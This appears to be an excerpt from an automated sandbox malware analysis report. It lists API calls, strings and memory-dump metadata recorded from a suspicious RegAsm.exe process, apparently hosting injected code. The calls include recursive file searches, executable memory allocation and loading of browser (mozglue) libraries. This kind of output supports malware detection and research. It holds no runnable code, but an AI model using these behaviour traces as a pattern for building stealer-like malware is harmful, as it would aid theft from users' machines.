                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcpy.KERNEL32(00000000), ref: 0040FE63
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcat.KERNEL32(?,00000000), ref: 0040FE6F
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040810B
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040811F
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcpy$lstrlen$lstrcat
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2500673778-0
                                                                                                                                                                                                                                                    • Opcode ID: 80939933e9bb62a304a8a6f5f6ab90fd9a5a09ea7be375ed00fbf10442b0a5d4
                                                                                                                                                                                                                                                    • Instruction ID: 5802ae16847147e7e2b41df3c74560bf2ef48d63530e09df17106534113733f6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 80939933e9bb62a304a8a6f5f6ab90fd9a5a09ea7be375ed00fbf10442b0a5d4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7DB18F71805248EACB14EBE4C955AEEBBB8AF19304F54417EE406736D2DB382B0CCB75
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00411530: SHGetFolderPathA.SHELL32(00000000,^iB,00000000,00000000,?,00000000), ref: 00411568
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 004176C7
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,015D1828), ref: 004176E6
                                                                                                                                                                                                                                                      • Part of subcall function 004173B0: wsprintfA.USER32 ref: 004173E8
                                                                                                                                                                                                                                                      • Part of subcall function 004173B0: FindFirstFileA.KERNEL32(?,?), ref: 004173FF
                                                                                                                                                                                                                                                      • Part of subcall function 004173B0: StrCmpCA.SHLWAPI(?,00427500), ref: 0041743C
                                                                                                                                                                                                                                                      • Part of subcall function 004173B0: StrCmpCA.SHLWAPI(?,00427504), ref: 00417456
                                                                                                                                                                                                                                                      • Part of subcall function 004173B0: wsprintfA.USER32 ref: 0041747B
                                                                                                                                                                                                                                                      • Part of subcall function 004173B0: StrCmpCA.SHLWAPI(?,0042717E), ref: 0041748A
                                                                                                                                                                                                                                                      • Part of subcall function 004173B0: wsprintfA.USER32 ref: 004174A7
                                                                                                                                                                                                                                                      • Part of subcall function 004173B0: PathMatchSpecA.SHLWAPI(?,?), ref: 004174D7
                                                                                                                                                                                                                                                      • Part of subcall function 004173B0: lstrcat.KERNEL32(?,015CF750), ref: 00417503
                                                                                                                                                                                                                                                      • Part of subcall function 004173B0: lstrcat.KERNEL32(?,0042751C), ref: 00417515
                                                                                                                                                                                                                                                      • Part of subcall function 004173B0: lstrcat.KERNEL32(?,?), ref: 00417523
                                                                                                                                                                                                                                                      • Part of subcall function 004173B0: lstrcat.KERNEL32(?,00427520), ref: 00417535
                                                                                                                                                                                                                                                      • Part of subcall function 004173B0: lstrcat.KERNEL32(?,?), ref: 00417549
                                                                                                                                                                                                                                                      • Part of subcall function 004173B0: wsprintfA.USER32 ref: 004174C6
                                                                                                                                                                                                                                                      • Part of subcall function 004173B0: FindNextFileA.KERNEL32(000000FF,?), ref: 00417617
                                                                                                                                                                                                                                                      • Part of subcall function 004173B0: FindClose.KERNEL32(000000FF), ref: 00417629
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$wsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 153043497-0
                                                                                                                                                                                                                                                    • Opcode ID: 9fb54ca20fe2cffefdbf3ad616eef28bda897d501f7ebb2f88a1b162a4478fbc
                                                                                                                                                                                                                                                    • Instruction ID: 4b8fbc186d192a9501c9b4b0c12e65ea48b1852fb00ff51ca67b44139ad5a539
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9fb54ca20fe2cffefdbf3ad616eef28bda897d501f7ebb2f88a1b162a4478fbc
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C851BEB5900208EBCB15EFA4CC42EFE7779AB48704F00426EF81567291DB786B54CBA5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(?,00000000,00003000,00000040,00000000,?,?,?,00406A0E,00000000), ref: 004065AF
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040,?,?,00406A0E,00000000), ref: 004065E3
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                                                                                                                    • Opcode ID: 05b4c1d6b8d8c16b753068be011d095b66a4696be7e78814b8d4b5191835b582
                                                                                                                                                                                                                                                    • Instruction ID: 307c63db32dd85507ef60eb9078a071d01a6145ff22a74080f45120ef5a07aab
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 05b4c1d6b8d8c16b753068be011d095b66a4696be7e78814b8d4b5191835b582
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B021E4713407006BD334CF79DC81BABB7EAEB84714F14492EEA1EDA3D0D679E8408658
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
Yara matches
Uniqueness Score: -1.00%

APIs
• LocalAlloc.KERNEL32(00000040,00413AC1,?,00000001,00000004,?,00413AC0,00000000,00000000), ref: 004115AC
Memory Dump Source
• Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: AllocLocal
Uniqueness Score: -1.00%

APIs
• CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C6E6CCC
• CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C6E6D11
• moz_xmalloc.MOZGLUE(0000000C), ref: 6C6E6D26
  • Part of subcall function 6C6ECA10: malloc.MOZGLUE(?), ref: 6C6ECA26
• memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6C6E6D35
• CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C6E6D53
• CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6C6E6D73
• free.MOZGLUE(00000000), ref: 6C6E6D80
• CertGetNameStringW.CRYPT32 ref: 6C6E6DC0
• moz_xmalloc.MOZGLUE(00000000), ref: 6C6E6DDC
• memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C6E6DEB
• CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6C6E6DFF
• CertFreeCertificateContext.CRYPT32(00000000), ref: 6C6E6E10
• CryptMsgClose.CRYPT32(00000000), ref: 6C6E6E27
• CertCloseStore.CRYPT32(00000000,00000000), ref: 6C6E6E34
• CreateFileW.KERNEL32 ref: 6C6E6EF9
• moz_xmalloc.MOZGLUE(00000000), ref: 6C6E6F7D
• memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C6E6F8C
• memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6C6E709D
• CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C6E7103
• free.MOZGLUE(00000000), ref: 6C6E7153
• CloseHandle.KERNEL32(?), ref: 6C6E7176
• __Init_thread_footer.LIBCMT ref: 6C6E7209
• __Init_thread_footer.LIBCMT ref: 6C6E723A
• __Init_thread_footer.LIBCMT ref: 6C6E726B
• __Init_thread_footer.LIBCMT ref: 6C6E729C
• __Init_thread_footer.LIBCMT ref: 6C6E72DC
• __Init_thread_footer.LIBCMT ref: 6C6E730D
• memset.VCRUNTIME140(?,00000000,00000110), ref: 6C6E73C2
• VerSetConditionMask.NTDLL ref: 6C6E73F3
• VerSetConditionMask.NTDLL ref: 6C6E73FF
• VerSetConditionMask.NTDLL ref: 6C6E7406
• VerSetConditionMask.NTDLL ref: 6C6E740D
• VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C6E741A
• moz_xmalloc.MOZGLUE(?), ref: 6C6E755A
• memset.VCRUNTIME140(00000000,00000000,?), ref: 6C6E7568
• CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6C6E7585
• _wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C6E7598
• free.MOZGLUE(00000000), ref: 6C6E75AC
  • Part of subcall function 6C70AB89: EnterCriticalSection.KERNEL32(6C75E370,?,?,?,6C6D34DE,6C75F6CC,?,?,?,?,?,?,?,6C6D3284), ref: 6C70AB94
  • Part of subcall function 6C70AB89: LeaveCriticalSection.KERNEL32(6C75E370,?,6C6D34DE,6C75F6CC,?,?,?,?,?,?,?,6C6D3284,?,?,6C6F56F6), ref: 6C70ABD1
Strings
Memory Dump Source
• Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
• Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
Similarity
• API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
• String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C71F09B
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C6F56EE,?,00000001), ref: 6C6F5B85
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5B50: EnterCriticalSection.KERNEL32(6C75F688,?,?,?,6C6F56EE,?,00000001), ref: 6C6F5B90
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5B50: LeaveCriticalSection.KERNEL32(6C75F688,?,?,?,6C6F56EE,?,00000001), ref: 6C6F5BD8
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5B50: GetTickCount64.KERNEL32 ref: 6C6F5BE4
                                                                                                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C71F0AC
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5C50: GetTickCount64.KERNEL32 ref: 6C6F5D40
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5C50: EnterCriticalSection.KERNEL32(6C75F688), ref: 6C6F5D67
                                                                                                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C71F0BE
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5C50: __aulldiv.LIBCMT ref: 6C6F5DB4
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5C50: LeaveCriticalSection.KERNEL32(6C75F688), ref: 6C6F5DED
                                                                                                                                                                                                                                                    • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C71F155
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71F1E0
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C71F1ED
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C71F212
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71F229
                                                                                                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C71F231
                                                                                                                                                                                                                                                    • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C71F248
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71F2AE
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C71F2BB
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C71F2F8
                                                                                                                                                                                                                                                      • Part of subcall function 6C70CBE8: GetCurrentProcess.KERNEL32(?,6C6D31A7), ref: 6C70CBF1
                                                                                                                                                                                                                                                      • Part of subcall function 6C70CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6D31A7), ref: 6C70CBFA
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C71945E
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C719470
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C719482
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: __Init_thread_footer.LIBCMT ref: 6C71949F
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71F350
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C71F35D
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C71F381
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71F398
                                                                                                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C71F3A0
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71F489
                                                                                                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C71F491
                                                                                                                                                                                                                                                      • Part of subcall function 6C7194D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C7194EE
                                                                                                                                                                                                                                                      • Part of subcall function 6C7194D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,?,00000000,?), ref: 6C719508
                                                                                                                                                                                                                                                    • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C71F3CF
                                                                                                                                                                                                                                                      • Part of subcall function 6C71F070: GetCurrentThreadId.KERNEL32 ref: 6C71F440
                                                                                                                                                                                                                                                      • Part of subcall function 6C71F070: AcquireSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C71F44D
                                                                                                                                                                                                                                                      • Part of subcall function 6C71F070: ReleaseSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C71F472
                                                                                                                                                                                                                                                    • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C71F4A8
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71F559
                                                                                                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C71F561
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71F577
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C71F585
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C71F5A3
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • [D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C71F56A
                                                                                                                                                                                                                                                    • [I %d/%d] profiler_resume, xrefs: 6C71F239
                                                                                                                                                                                                                                                    • [I %d/%d] profiler_resume_sampling, xrefs: 6C71F499
                                                                                                                                                                                                                                                    • [I %d/%d] profiler_pause_sampling, xrefs: 6C71F3A8
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CurrentExclusiveLock$Thread$AcquireRelease$CriticalSectionTime_getpid$?profiler_time@baseprofiler@mozilla@@getenv$Count64EnterLeaveProcessStampTickV01@@Value@mozilla@@$BaseCounterDurationInit_thread_footerNow@PerformancePlatformQuerySeconds@Stamp@mozilla@@TerminateUtils@mozilla@@V12@___acrt_iob_func__aulldiv__stdio_common_vfprintf
                                                                                                                                                                                                                                                    • String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
                                                                                                                                                                                                                                                    • API String ID: 565197838-2840072211
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(detoured.dll), ref: 6C6E64DF
                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6C6E64F2
                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6C6E6505
                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6C6E6518
                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C6E652B
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6C6E671C
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 6C6E6724
                                                                                                                                                                                                                                                    • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C6E672F
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 6C6E6759
                                                                                                                                                                                                                                                    • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C6E6764
                                                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6C6E6A80
                                                                                                                                                                                                                                                    • GetSystemInfo.KERNEL32(?), ref: 6C6E6ABE
                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6E6AD3
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6E6AE8
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6E6AF7
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
                                                                                                                                                                                                                                                    • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
                                                                                                                                                                                                                                                    • API String ID: 487479824-2878602165
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00010030), ref: 6C6FEE7A
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6C6FEFB5
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,?,?), ref: 6C701695
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C7016B4
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(00000002,000000FF,?,?), ref: 6C701770
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C701A3E
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: memset$freemallocmemcpy
                                                                                                                                                                                                                                                    • String ID: ~qml$~qml
                                                                                                                                                                                                                                                    • API String ID: 3693777188-1426070390
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00416FCE
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00416FD5
                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00416FEE
                                                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 00417005
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,004274E8), ref: 0041703C
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,004274EC), ref: 00417052
                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00417070
                                                                                                                                                                                                                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 004170C8
                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 004170D7
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,015CF750), ref: 004170FB
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,015D1628), ref: 0041710F
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(000000FF), ref: 00417119
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(000000FF), ref: 00417127
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Find$FileHeaplstrcatlstrlenwsprintf$AllocCloseFirstNextProcess
                                                                                                                                                                                                                                                    • String ID: %s\%s$%s\*$0sA
                                                                                                                                                                                                                                                    • API String ID: 1803110163-21133683
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C75E744), ref: 6C6E7885
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C75E744), ref: 6C6E78A5
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C75E784), ref: 6C6E78AD
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C75E784), ref: 6C6E78CD
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C75E7DC), ref: 6C6E78D4
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,00000158), ref: 6C6E78E9
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00000000), ref: 6C6E795D
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,00000160), ref: 6C6E79BB
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 6C6E7BBC
